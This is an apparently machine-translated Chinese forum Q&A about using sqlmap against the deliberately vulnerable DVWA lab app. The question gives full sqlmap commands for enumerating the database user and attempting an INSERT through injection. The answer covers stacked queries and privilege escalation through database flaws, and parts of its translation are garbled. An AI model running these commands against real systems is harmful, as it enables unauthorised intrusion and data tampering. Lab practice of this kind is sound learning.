如何使Sqlmap获得数据库的管理员权限？

Question

我正在使用sqlmap来利用DVWA项目中的数据库。

然而，在利用了数据库之后，我执行了以下命令来了解用户是dvwa@%：

sqlmap -u "http://192.168.71.130/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" -p id --cookie="security=low; PHPSESSID=kikm4b9s9tdk5kq21cs20jt9j1;" --current-user

我试图在表中添加一些内容，并使用以下命令：

sqlmap -u "http://192.168.71.130/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" -p id --cookie="security=low; PHPSESSID=kikm4b9s9tdk5kq21cs20jt9j1;" --sql-query="INSERT INTO guestbook (comment,name) VALUES ('foo','bar');"

但是，这是失败的--尽管基本的SELECT语句工作良好。

我猜dvwa@%用户没有INSERT/UPDATE的特权。

sqlmap是否可以自动获得数据库的管理员权限(在本例中是DVWA)？

Answer 1

1)如果要插入SELECT/UPDATE/DELETE查询，则只能在堆叠查询可用时发出INSERT语句(必须关闭原始查询并启动新的SQL语句)。这是SQL语言的一个限制。

2)权限升级将需要数据库服务器或存储过程中的一个漏洞。检查服务器版本并查找以特权用户身份执行的存储过程(例如，server情况下的执行为语句)。在发现漏洞后，应该执行触发器指令，如果没有堆叠查询，这可能会有问题。